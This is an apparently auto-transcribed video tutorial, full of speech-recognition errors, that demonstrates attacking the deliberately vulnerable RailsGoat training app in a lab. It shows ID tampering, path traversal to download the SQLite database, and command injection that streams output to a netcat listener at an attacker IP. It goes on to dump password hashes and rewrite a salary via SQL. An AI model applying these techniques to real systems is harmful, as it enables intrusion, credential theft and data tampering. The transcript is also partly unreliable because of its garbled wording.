Introduction
today I’ll be teaching you how you can be as good looking as Mr hack alloy I’m just kidding I’ll be teaching you how to be a hackering state which is much easier and now before we get started kids remember hacking is illegal if you get caught hacking there’s really nothing much I can do to help you the police will come knocking on your door get you arrested and the next thing you know you can never see Mr hackaloy again
so here’s a list of things they’ll be doing
so first of all you have a be entering the website URL over here and of course in this case it could be say loy liang.com as your target well I mean we’re not here for online shopping yok now next up what you’ll be doing over here is to then begin targeting the server using a operating system like color Linux that is loaded with all these different type of hacking tools scripts and so on that we can Target the site on in this case we’ll be looking out for potential vulnerabilities on the side so vulnerabilities could be for example SQL injection that we can Target it could be operating system command that we can Target as part of different parts of the site features and the craziest thing is that we can even change information that are displayed on the site so you can do just that and the reason we can do that is because behindevery website there is a large gigantic database of all this different information that could be containing like username like passwords like salary information okay that’s very juicy and lots of all this different data that we can Target and now before we get started kids this is going to be a pretty long tutorial and you need at least 15 cups remember kids with great power comes great responsibility and what you need to do right now is to turn on notifications so that you don’t get hacked alright so right in front of us we’re in color links those this is going to be your best friend here and of course your best friend forever your BFF is hacker or Loy and of course the next best friend is called Linux so what I can do now is go ahead and open up a browser so in this case we have say Firefox and what you can do now is typically you can Target the site by entering under the URL so in my case I can enter the phone point of y2168.0 the 1844 by slash Wheels goat so this is going to be the website that we will be targeting and of course in other cases you can be going to say loy liangyang.com the targeted site but if you really Target loyalangyoung.com I assure you I will find out your IP address I will find out everything about your location your name your password ohdon’t worry I’m just helping you find out your password so right in front of us we are on the login page so we can go ahead and say for example login to the site or at the same time registering antrying to figure out the application structure we have to really understand how data flow from the browser all the way to the backend system so in this case I have already created an account so I can go ahead and log in right here hackaloy at hackaloy.com as you can see right here and of course I can enter the password to log right in and I click login boom done so we are now login and of course this looks like a human resource HR System and of course we have the 401K we have the available PTO sick days taken income and so on and so forth so and you see on the left side all this are the different parts or pages of the site that we can Target and of course the very first thing you need to do as a professional hacker is to go over each of these pages so that you understand the application structure inside out and understand how the pages work what are the URLs so of course you can see right here in this case we have something pretty interesting already so if you see right here we have the following of the URL and of course in the URL we have users we have a number and then we have say another page here called benefit forms so this reviews a lot of things because if I was to create another user with seven become another digit the other thing that we’re looking out for as you can see here is we have health insurance as well as dental insurance and the ability to upload a file now looking over here we can and go ahead and say click under health insurance as well as dental insurance and we can see over here all right we have a PDF document and so on and we have the following information over here again we are targeting the URL so we have the download question mark name equal dot PDF and type equal file so pretty interesting so this one is a possible entry point or injection point for us likewise under denter and stuff not PDF and type equal files again this is another possible entry point for us the reason why I say this could be a potential entry point is because if was to change this over into dot dot slash dot dot slash dot dot slash would I be able to reach another file of interest just by pointing it to a completely separate file name or path and maybe you’re thinking Mr hackaloy why aren’t you doing a Brute Force attack against the login page now on a website you would have a login page typically and of course what the hackers will be doing is to talk Target the login page using all sorts of email addresses that they possibly have already mined or harvested as well as the password View using say all the different combinations or commonly used passwords like one two three four five six seven eight password as passwords all these are the commonly used passwords it’ll be injecting them directly into login field the downside to this is that it is easily detectable and prevented at the application or at the firewall level well what we need to do then is to be more creative in our attack approach and what we’ll be doing now is to go to top right corner and set up our Interceptor and in this case we’ll be using burp Suite as our Interceptor to look at all the different requests that are going to be sent over into application server so go and click on that next up the super cool stuff that you want to learn which is to look like a hacker you open up terminal right now and go and enter a burp Street now and go and enter a burp Street Follow by n and now we’re opening up our Interceptor so here we have the burp Suite Community Edition all right go ahead and click Start burp and what we can do now is go under the proxy Tab and ensure the intercept on so once we have that I can go ahead and click upload file click add file so in this case I can go ahead and add up a I can upload a normal file so perhaps in this case I can go ahead and select under something called Dark Dash or don’t hash.txt and we have that right here go ahead and click Start upload and we’re intercepting right now okay so let’s go ahead and go back to burp Street Community Edition so this is a live reload so go ahead and drop this one and right here we have the post rose gold upload so do a right click on this send over to repeater the reason why I’m sending over the repeater is because I want to understand about what is part of the HTTP request that is going to be sent over to the application server so right here we can see the following all right so we have the post so this is the HTTP method so we are going to be uploading things or posting things over into Target URL here which is rose gold upload all right we have the user agent information as part of a browser ASAP as sub language content type so in this case we have multi-part form data all right so we have the origin referral or a kooky information right so referral or a kooky information right so we have the reals guilt session right so this is something that you’re using as part of your session identity right so your session value what not so that’s part of the cookie and as I scroll down further we have the upgrade insecure request one we have the content disposition right so in this case we have the name of utf-8 and we have a tick here possibly to indicate some form of say it is a legitimate request and whatnot so that could be the case and I have more content disposition authenticity token okay that’s interesting this could be a data they will be using later on we have a false under benefits backup okay that’s interesting so typically if there is a force value sent over as a in this case we have the file as well as the file information right at the bottom so this is the hackaloy salary dot doc so and so forth so this was part of another tutorial that we did earlier now to speed up your learning as part of running all of this different type of checks scans looking out for vulnerable openings the whole idea behind article hacking or hacking as a whole is to find entry points injection points whether they are structure query language ejection whether operating system command injection the goal is to find a part of the site that is vulnerable that’s the whole idea of hacking so in this case what happens if I change this to true so over here you can see the following of benefits backup so what is it trying to do is try and copy a file that is uploaded into a backup directory could that be the case we don’t know because this is a black box testing so we have no idea about the application structure and we need to figure that out first so in this case if I change this to true what would happen all right so you go ahead and click Send and you can see on the right okay you are being redirected okay that’s interesting so you are being sent back over into the rails good user seven benefit forms and so on so forth so that is to be expected okay so if I was to change this back to the default value of false I click Send same thing all right not much changes have been seen so there could be some kind of possible instructions either based on the application itself or on the operating system level right so those are things that can possibly be running as part of this application structure and we want to exploit that moving on we can also click onto other pages so in this case we have say 401K info so you can see once again under the URL real estate users 7 retirement all right so PTO all right work info and so on and so forth so possibly one of it may have a vulnerability a meaning that if we were to change this value over here we may see something else so say for example I change this to six I hit enter on that and boom we see someone else’s data right I enter five oh we see Ken Johnson’s data so again there are different parts of the site that could be vulnerable and in some parts of the site they are not and in other parts they are vulnerable so all these are different type of things you can possibly hit to see whether you are getting a vulnerable entry point to go after all right so all these are the different possibilities that you can use different possibilities that you can use also have messages on the left so when you click on the messages you’re able to send message to the different users within the application so this uses their store in the backend database system typically if you are able to send messages you may be thinking about doing something called the cross-size scripting attack so this is a point where you can inject your own script and when the user open up the message it possibly redirects them to hackaloid.com all right so those are things that you can do as part of sending out the message so you send some scripts along with the message finally not to miss our ending if you go to top right corner you can click on our account settings and in account settings you’re able to update your personal information too so like twice if you go under the foxy proxy and if I was go ahead and enter the first name I’ll say hacker Loy and then I have to pass it for you over here so maybe I enter a password field forward password confirmation and I go ahead and click submit on this one I click submit I go to burp Street or I go to proxy Tab and of course I can go ahead and drop this one I would drop the live reload and of course in this case we have post users seven dot Json all right in this case you see at the bottom we have the user and password confirmation all this different details so if I send over to repeater so on the second repeater tab you can see the different information here that is sent along to the backend system all right so behind every application server there is a database and we also want to figure out what kind of database are they using is it a Microsoft SQL is it a mySQL database and possible SQL is it a SQL light and all of that so all these different possible databases that we are targeting as part of launching the hack
now as far as testing we really want to understand what are the potential areas or entry points or injection points so as part of testing you have three rental several checks against all these different parameters or input fields andyou have uncovered a file name is susceptible to operating system command injection so in that case what we can do here under file name is you can test them out all right so in this case in this situation I can say LS all rightand then I can have a possible connectivity over into the hackers machine so in this case we have 118 and in Port 4444 so what this will do is to stream the LS which is listing of the files and directories within the current working directory over into our hackers machine so in this case I can go ahead and set up the netcat all right so in this situation I can enter the following of ipadvr so this is the Hacker’s IP address of 182168.0118 and what I can do now is go ahead and enter NC right so we’resetting up our listener so the listener is set up right now I can go back over we have the ls right followed by netcat over into 102 168.0.118.4444 so in this case if I was go ahead and enter send let’s see what we get I go back to the netcat listener and we can see right here we have the following information and there you go you have hacked into the machine so this is the current working directory of the application server so in this case we have several interesting directories right so hereyou can see the following of possibly database config all right so all this are the different targets that we’re going after because we want to find out if they’re storing the usernames or the password somewhere so now with operating system command injection this allowed us to build out the application structure very cleanly so what I can do now is goahead and change this up a little bit so I want to know what is the current working directory so I’ll be using PWD which is pre-working directory and again sending information over into the hackers machine so what I can do now is go ahead and set up a listener go back to burp so you click Send and you can see right here we have the following of o w ASP bwa rails goat Dash git and now what I’ve done here is I’ve copied the results from the operating system command injection over here so we understand that the application is operating on all the blue ASP bwa realGoods Dash git and of course we are targeting say the directory of DB which could likely stand for database which we are very interested in because it could possibly show us some of this information like usernames passive views and so on that would allow us to do other things all right so we go back over into bread Suite right and in this case we want to Target and see what is inside of the DB folder or directory so you see right here we’ve changed up the operating system command a little more so we do a CD over into the following directory of dbe and then we do the following of Ls so what we’re doing here now is to go into the working directory of database and then after which we do a listing all right so let’s go ahead and do that right now so go ahead and set up your listener go back to burp Suite click Send go back to the following you can see the following development dot SQL lite3 all right we have the schema.rb c-store RV and test dot sqlite3 so what we want to do now is go ahead and figure a way to download that file so in this situation if I go back over to rails code download name equal so what I can do here is try to see whether we’re able to Target that directory holding the development dot sqlite free file right so what I can do now is do a DOT slash dot slash all right so the reality is we don’t know what is current working directory but with five of this over here which allow us to move back to the root directory and then we can go ahead and Target the following so if I go back into here we have the owasp bwa rose gold dash kit so I go back over the URL I paste it over here I remove this one and I have a slash DB slash development dot sqlite3 all right so if I go back over the results over here this is the file that we are targeting so I go back over to the browser I hit enter on this and now we can save the file all right so let’s go ahead and save it and go ahead and replace the file so I’ve already done this setup and testing for you done we managed to download the file because of a vulnerability another entry point for us to download information from within the operating system at this point I’m enter on that and now we can query the database so in this case you can enter doc tables and we can see the following so all these are different tables that are within the application server so in this case we can see things like benefits paid time offs retirements users user is pretty interesting messages pay schedules work infos so all this are the different tables that we are targeting so in this case we want to say interact so I can enter select star from users hit enter and boom this is super cool so we have the following of admin at metacarp.com all right we have Jack we have Jim Mike can Loy Leon young gmail.com hack alloy as well so all these are the different users and likely the second column seems to be some kind of hashed password so we could possibly go back to rainbow tables where we have all this list of commonly used passwords that are thrown into the same hashing algorithm and do a reverse lookup on and see what we get right so we get all these beautiful details right here Additionally you can also enter all right followed by the table on the store info and in this case we can go for users hit enter in that and can see the following of the columns all right so we have the First Column as ID second is email third as password and admin okay that’s interesting so whether the user is an admin or not an admin so true or false so pretty straightforward and then we got a user ID so user ID you can see here it is being added incrementally so you have one two three four five six and seven so all these are added incrementally and finally we have the another interesting piece of information we can possibly use as say trying to hijack another uses session now before I go any further you may be thinking why do I go straight for a reverse shell especially now I have the ability to run operating system commands so before I jump further what are exactly reverse shells so right here you have on the left the target server and of course on the right you have Mr hackaloy and what you can do now is you can possibly just automatically run an operating system command injection or operating system command and send that to connect over to Mr hackaloy’s machine and then we can remotely control the Entire Computer however the reason why we cannot do that in this tutorial is because there is some kind of application sanitization of input or some kind of possible firewall that’s operating protecting the application system so what’s happening right here as you can see is right in the middle which seem to have a firewall and the firewall or possibly sometimes it’s also embedded within the application layer is that it is filtering some of this common type of special characters like slash like single quotes all right like double quotes and semicolon as possibly too so all these are the different types of Smash characters that may be completely removed all right as part of protecting the application against all these different types of attacks now going back to analytics what you want to do is there a way for us to update our salary information so that’s pretty interesting interesting so I can do say select star from the following of work underscore infills hit enter on that and we can see the following so we have the user all right ID of seven and now we are currently on sixty thousand dollars so is there a way for us to change this using a million so the answer is yes and we do need a combination of several things so in order for this hack to work through so the first thing we need to do is to upload a file containing some instructions and number two is to then execute on that file that will then provide information to the execution all provide information to the execution all doing here so what I can do now is go ahead and enter the following all right so we have cd over to DB and what I want to do now is because remember it is escaping all right the single quilt it is escaping the forward slashes and backwards slashes so we’re very limited on what we can do so what we have here is the final payload so what we do now is we see the or change directory to database and we do an echo and in this case we’re doing an update work in fulls set income to 100 000 where user ID is equal to seven
conclusion
now we do a semicolon to end off the sqlite command all right which is again in this case a structured query language command so of course in that case where we have the single code all right so this allows
us to end off whatever we want to Echo here save it to a file within the DB directory and then we put a hexer which is to comment out the rest of the operating system command so super clean super neat super smart and once you’re ready go ahead and click Send and boom done the file is now created on the back-end database you can easily do a check on that so what you can do if you want to check on this you can again go over cddb and do ls-l and followed by the following of netcat 192.168.0.118 and then say 0.4444 right so this again allows us the ability to send those information because of the operating system command injection that we discover as an entry point so I can do NC all right nlvp444 hit enter on that go back to burp Suite go ahead and click Send on this and see what we get as a result so if I go back over here I can see right here we have fall and it’sbeen updated all right based on the most current time okay if I do a of course you can do a cat on Fall as well and be able to get those information out of itso what we want to do now is to go back to burp Street and do execute on the update all right so this is the final payload so we have to change directory to database directory again and we have the SQL Lite 3 development.sqlite3 and then of course we run the following instructions from following in the file which is to update the works info so the hacker law gets a better salary and of course we have the hex on the end coming out the rest of the operating system command once you ready to click Send boom I go back over to browser click under work info and right here we have
the income of a hundred thousand dollars so thank you for giving me a better salary